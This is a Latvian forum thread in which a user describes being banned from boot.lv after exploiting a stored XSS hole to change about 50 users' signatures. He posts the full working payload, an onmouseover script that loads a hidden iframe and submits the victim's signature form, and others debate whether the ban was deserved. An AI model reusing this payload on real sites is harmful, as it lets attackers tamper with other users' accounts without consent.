Jump to content
php.lv forumi

boot.lv drošības caurums


betons

Recommended Posts

Sveiki!

 

Tātad šodien mani izbanoja no boot.lv.

Pat ļaunāk izdzēsa manu kontu! Eh!

 

Tas viss tāpēc, ka centos šiem palīdzēt.

Tātad viņu lapā, lietotāju apskati

http://www.boot.lv/index.php?pg=15&cat=4

 

iespēja pievienot savu apskatu un tur ļauj izmantot b, i, u tagus.

Bet par brīnumu pie b taga atļauti arī eventi.

 

Tākā boot.lv ziņas un boot.lv/forums forums atrodas uz viena domeina, tad lieta sekojoša

uz bold taga onmoseover tiek izveidots ifreims, kurā ielādē lietotāja konta penlei un nomaina lietotāja parakstu uz priecīgi ziemassvētki.

 

Tad boot.lv forumā izveidoju diskusiju par to, ka ir šāds caurums un ka to vajadzētu sataisīt un ieliku linku uz caurumu.

Protams kādiem 50 lietotājiem paraksots ielikās: Priecīgus ziemmassvētkus by Bērzs.

 

Nu, tad admini ņēma mani un izdzēsa.

Es viņiem palīdzu atklāt drošības caurumu, nevainīgā veidā nodemonstrējot cauruma nozīmību, bet šie tā.

 

Vai tas ir normāli?

 

 

 

Kods šeit:

 

<b id="lol" onmouseover="function $(ob){return document.getElementById(ob);} $('lol').onmouseover='';$('top').innerHTML=''; self.timerlol=function(){ $('top').innerHTML+='Priecīgus ziemassvētkus '; setTimeout('timerlol();',100);}; timerlol(); aaa=0; o=document.createElement('iframe'); o.style.width='0px'; o.style.height='0px'; o.src='http://www.boot.lv/forums/index.php?act=UserCP&CODE=22'; document.getElementById('lol').appendChild(o); function onlol(){if (aaa==0) {o.contentDocument.getElementById('postcontent').innerHTML='[size=5]Priecīgus ziemassvētkus[/size] by Bērzs'; o.contentDocument.getElementById('postingform').submit(); aaa=1;}} o.onload=onlol;">Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. Spied uz šī teksta, lai redzētu boot.lv drošības caurumu. </b>

 

 

 

P.S. Ja šo lasa kāds boot.lv admins, tad atgrieziet manu kontu, es taču jums palīdzēju.

Edited by betons
Link to comment
Share on other sites

  • Replies 87
  • Created
  • Last Reply

Top Posters In This Topic

Protams, ka pēc, kāda jēga sūtīt pirms?

Bet sūtīju viņu forumā, tāpēc viņiem bija reāla iespēja izlabot dažās desmitās minūšu.

 

Citos forumos sūtīju, kad jau bija izlabots.

 

Bet reāli tas bija godīgs darījums, pāris minūtes slavas pret to, ka atklāju viņiem, kur ir drošības caurums. :D

 

Bet šie ņem un nobano pavisam!

Ar šādu drošības caurumu, tak varēja tikt klāt adminu sesijām un foruma administrēšanai, un tad arī serverim.

Link to comment
Share on other sites

Atvaino, ka grauju tavus uzskatus, bet forumu lietošana ir privilēģija nevis pašsaprotamas tiesības. Tāpēc pilnībā atbalstu boot adminu rīcību izdzēšot tevi par šādiem gājieniem. Ja nevari godīgi izmantot viņu piedāvātos resursu, kuri pie tam ir bez maksas, tad kamdēļ tu viņiem tur būtu vajadzīgs? Lai regulāri visiem lietotājiem mainītu parakstus?

Būtu normāli paziņojis un izskaidrojis šo caurumu, tad arī gūtu "slavu" boot adminu acīs. Tagad neviena acīs tu savu "slavu" neesi guvis. Izskatās, ka tev tik atlicis nākt un žēloties citos forumos, ka tevi apbižojuši...

 

Ja kādas bankas interneta lapā atradīsi līdzīgu caurumu, tev tak arī nenāksies prātā doma tagad visiem lietotājiem, piemēram, mainīt paroles, ne? Jo tad toč tu diezgan ātri sagaidītu attiecīgo iestāžu darbiniekus pie savām durvīm ciemos atnākam ;)

Link to comment
Share on other sites

wtf? Iešana pa ielu arī nav bezmaksas, jo uz māju sienām ir reklāmas?

 

Atzīti tu to vai nē, bet tā tiešām ir!

Ja ejot pa ielu, tu ieraugi reklāmu, tad tu par to maksā ar

savas zemapziņas vai apziņas ietekmēšanu un attiecīgā produkta vai pakalpojuma pirkšanu.

Vai arī tiek ietekmēta tava politiskā izvēle.

Varbūt tiek ietekmēta tava vērtību sistēma tev par sliktu.

 

Un tikai nevajag teikt, ka tu esi supercietā klints, kuru nekas neietekmē, nu lai jau ar, tomēr 99.9% citus ietekmē un viņi par to maksā.

 

 

 

EDIT:

P.S. boot.lv foruma postā nebija izskaidrota cauruma būtība, bet tika veikta tikai tā realizācija, lai pievērstu lielāku uzmanību lažai kādu ir pielaiduši boot.lv programmētāji.

Ja es to vienkārši pateiktu adminam, tad nebūtu ne silts, ne auksts.

Nu, izlabojām un viss.

A tikt ta varēja pie adminu sesijām.

Edited by betons
Link to comment
Share on other sites

Būtu normāli paziņojis un izskaidrojis šo caurumu, tad arī gūtu "slavu" boot adminu acīs.

 

Slavai viņu acīs nav nekādas vērtības. Iedomīgi un uzpūtīgi cilvēki, kuri no ilgās moderēšanas boot.lv sevi jau uzskata par pasaules centriem (ar retiem izņēmumiem).

Link to comment
Share on other sites

Bah, tu tak pats gribēji to slavu, ne jau viņi. Aizmirsi, ko pats rakstīji?

pāris minūtes slavas

boot.lv ir vissakarīgākā moderācija, kuru esmu redzējis. Diezgan ātri un efektīvi tiek galā ar nekārtību radošiem indivīdiem.

 

Ja ejot pa ielu, tu ieraugi reklāmu, tad tu par to maksā ar savas zemapziņas vai apziņas ietekmēšanu un attiecīgā produkta vai pakalpojuma pirkšanu.

Jā un elpojot gaisu mēs patērējam tik ļoti dārgo skābekli, kura trūkuma dēļ smok tavs kaimiņš.

Atvaino, bet nu tiešām jābūt pasistam, lai uzskatītu, ka tu maksā par reklāmām internetā. Ja nespēj pats tās ignorēt, ir desmitiem brīnīšķīgu programmu, kuras to darīs tavā vietā.

 

Tavs

andrisp, katram savs labumiņš! ;)
ļoti labi parāda tavu attieksmi. Kārtējais ūber h4x0rz, kuram gribās tikai pazīmēties. Nevis normālā, cilvēcīgā veidā paziņot par to administrācijai. Tā ka nevajag tagad attaisnoties. Pelnīti vien esi dabūjis to banu.
Link to comment
Share on other sites

boot.lv ir vissakarīgākā moderācija, kuru esmu redzējis. Diezgan ātri un efektīvi tiek galā ar nekārtību radošiem indivīdiem.

Jā, ja moderācijas mērķis ir nodrošināt dažu adminu iespēju ņirgāties un apsmiet desmitiem citus foruma lietotājus un katrs mēģinājums teikt, ko pretī (ļoti daudzos gadījumos pamatoti), tiek aplauzts ar banu uz kādu laiku.

 

Jā un elpojot gaisu mēs patērējam tik ļoti dārgo skābekli, kura trūkuma dēļ smok tavs kaimiņš.

Atvaino, bet nu tiešām jābūt pasistam, lai uzskatītu, ka tu maksā par reklāmām internetā. Ja nespēj pats tās ignorēt, ir desmitiem brīnīšķīgu programmu, kuras to darīs tavā vietā.

Nu atvaino, tu varbūt lieto reklāmu bloķēšanas programmas, bet lielākā daļa nezin pat kas tas ir, tāpēc viņis skatās uz šīm reklāmam un viņu uzmanība, apziņas un zemapziņas ietekmēšana, izvēle par labu vienam vai otram pakalpojumam vai produktam ir maksa par foruma lietošanu.

Tas, ka tu to neatzīsti, nemaina lietas būtību.

 

 

Tavs ļoti labi parāda tavu attieksmi. Kārtējais ūber h4x0rz, kuram gribās tikai pazīmēties. Nevis normālā, cilvēcīgā veidā paziņot par to administrācijai. Tā ka nevajag tagad attaisnoties. Pelnīti vien esi dabūjis to banu.

Manuprāt veids bija diezgan cilvēcīgs.

Bez tam, kam man gribēties viņiem, ko palīdzēt, ja viņi regulāri publiski apvaino un apsaukā desmitiem cilvēku?

Bet, dažiem tajā forumā tā slikti ar humora izjūtu, un vēl ziemassvētku laikā. Satraukums par tekstu priecīgus ziemassvētkus.

Varēju, tak uztaisīt tārpveidīgu skriptu, kurš no katra skriptam pakļautā lietotāja 20 rakstiem pēc kārtas ieliek komentāru ar linku uz skriptu. Tad, tas nebūtu cilvēcīgi, nemaz nerunājot, ka varēja tak piekļūt foruma administrēšanai.

Šis taču bija normāls ziemassvētku joks.

Edited by betons
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.

×
×
  • Create New...